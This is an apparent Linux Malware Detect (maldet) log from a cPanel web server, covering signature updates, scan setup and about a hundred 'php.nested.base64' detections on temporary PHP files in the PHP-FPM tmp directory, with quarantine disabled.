Jan 08 2026 04:05:56 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f60f014519.php
Jan 08 2026 04:05:56 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f8076bd209.php
Jan 08 2026 04:05:56 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f6129d315b.php
Jan 08 2026 04:05:56 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f60e399cef.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f1f1473ba2.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f80854264a.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f3ed35d88a.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f3ee108442.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f1fa88cd83.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f1dd620852.php
Jan 08 2026 04:05:57 web1 maldet(745130): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f406deca8d.php
Jan 08 2026 04:05:57 web1 maldet(745130): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 20791, malware hits 106, cleaned hits 0, time 205s
Jan 08 2026 04:05:57 web1 maldet(745130): {scan} scan report saved, to view run: maldet --report 260108-0402.745130
Jan 08 2026 04:05:57 web1 maldet(745130): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260108-0402.745130
Jan 09 2026 03:28:01 web1 maldet(1105456): {update} checking for available updates...
Jan 09 2026 03:28:01 web1 maldet(1105456): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 09 2026 03:28:01 web1 maldet(1105456): {update} hashing install files and checking against server...
Jan 09 2026 03:28:02 web1 maldet(1105456): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 09 2026 03:28:02 web1 maldet(1105456): {update} latest version already installed.
Jan 09 2026 03:28:02 web1 maldet(1105565): {sigup} performing signature update check...
Jan 09 2026 03:28:02 web1 maldet(1105565): {sigup} local signature set is version 20260107676235
Jan 09 2026 03:28:02 web1 maldet(1105565): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 09 2026 03:28:02 web1 maldet(1105565): {sigup} latest signature set already installed
Jan 09 2026 03:28:02 web1 maldet(1105653): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 09 2026 03:28:02 web1 maldet(1105653): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 09 2026 03:28:02 web1 maldet(1105653): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 09 2026 03:28:02 web1 maldet(1105653): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 09 2026 03:28:02 web1 maldet(1105653): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 09 2026 03:28:34 web1 maldet(1105653): {scan} file list completed in 32s, found 24949 files...
Jan 09 2026 03:28:34 web1 maldet(1105653): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 09 2026 03:28:34 web1 maldet(1105653): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (24949 files) in progress...
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f8091c947b.php
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f81dd86a8e.php
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c9380b8b5.php
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696027260f026.php
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960045e994b8.php
Jan 09 2026 03:31:18 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa15a612bd.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960451b57b56.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696087702b191.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa138b9962.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960894cdb02f.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960684eb1151.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc337b3d6c.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960aa1c312b1.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa0ec368cf.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960271907c09.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc1caaaddb.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc34283cf2.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696047fc18ba1.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f80022b3fb.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa2f2e3c17.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa2f9b1911.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960466f95c0b.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe2eca1f1e.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696024759c798.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a7e72679d.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960895b7f924.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a84b5dcdf.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696066977c63b.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe2e0315e0.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696024e6da4b8.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a9a73af2f.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696046828ddaf.php
Jan 09 2026 03:31:19 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa27753e3e.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960886edb224.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a9eee3f26.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa1739ca2d.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe304089da.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa26c62eb5.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696089a7cbce5.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960899d0dd14.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696026c1e6ae6.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa2e8625a2.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc3b19bb59.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c8b964f62.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960253538d59.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960aa05458d4.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a87830826.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696088850d130.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960250e59055.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc228de70a.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696045e276ad3.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f81d129390.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f809eb00ce.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696024d2b449c.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc3b94f67c.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe2f870a0c.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f81c7e15e4.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696045a712b56.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa0db1a1cc.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f818066bc8.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c8a2da36f.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f81680151c.php
Jan 09 2026 03:31:20 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f801a20552.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604724b83be.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960878429c31.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604807db42e.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960038b9e64d.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960261a7c100.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960c97b12ee9.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a8a5e0617.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960680a49077.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a7ad7060f.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960aa6986767.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe47323409.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696067dc73876.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe45bbbe23.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc1d7abb09.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69604531924a4.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960473877cee.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc39ff0b24.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960898f01dbc.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695f8196a6f7f.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc1bc2c47c.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69608897ea6f2.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696026d8a8094.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696045bbefa41.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696005c810793.php
Jan 09 2026 03:31:21 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960067ae084b.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a86141dff.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fe31a6d744.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960460e567b1.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69602521290d3.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696067453b566.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69600446060a7.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960270e0a3b6.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696047f001964.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fc3a825398.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_69608797d0193.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_695fa17fc8ac8.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_696047112b2b6.php
Jan 09 2026 03:31:22 web1 maldet(1105653): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-070c89434d4147be84e0bb24fe4632c5-ea-php83-php-fpm.service-GBCoOK/tmp/run_6960a88e76066.php
